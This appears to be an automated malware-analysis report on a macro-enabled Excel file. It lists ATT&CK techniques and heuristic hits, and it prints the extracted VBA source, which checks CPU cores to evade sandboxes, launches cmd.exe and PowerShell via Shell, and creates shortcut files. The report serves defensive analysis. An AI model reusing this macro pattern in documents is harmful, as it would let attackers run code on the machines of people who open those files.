MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that leverage WScript.Shell and cmd.exe to execute a PowerShell command. This command, 'cmd.exe /c powershell.exe z.hyybat >> o.bat', is likely responsible for downloading and executing a second-stage payload. The creation of .lnk files suggests an attempt to establish persistence or facilitate execution of the payload.
Heuristics 7
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Else Call Shell("cmd.exe /c powershell.exe z.hyybat >> o.bat") End If -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation) .Save -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Else Call Shell("cmd.exe /c powershell.exe z.hyybat >> o.bat") End If -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation) .Save -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48) -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
Else Call Shell("cmd.exe /c powershell.exe z.hyybat >> o.bat") End If
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1492 bytes |
SHA-256: ac108f27138472009bfd8704eabc65b2e4d247548cd2a13b49701bbdf348789d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
Private Sub Commandbh1_Click()
badCores = 0
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
For Each objItem In colItems
If objItem.NumberOfCores < 3 Then
badCores = True
End If
Next
If badCores Then
Else
Call Shell("cmd.exe /c powershell.exe z.hyybat >> o.bat")
End If
Dim sShortcutLocation As String
sShortcutLocation = "C:\o.lnk"
With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
.Save
End With
Dim sShortcutLocations As String
sShortcutLocations = "C:\Users\bjktup\uaz.lnk"
With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocations)
.Save
End With
End Sub
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 12288 bytes |
SHA-256: 9dfaa0e032a87881aa1d948c68aeb4935b50e57a9cab9ef458708030a8a0387b |
|||
emf_00.emf |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2748 bytes |
SHA-256: ec9cbea9cdcc5da6eea2effa606940bfc3d9e20253018fafee33281fac0b65fe |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.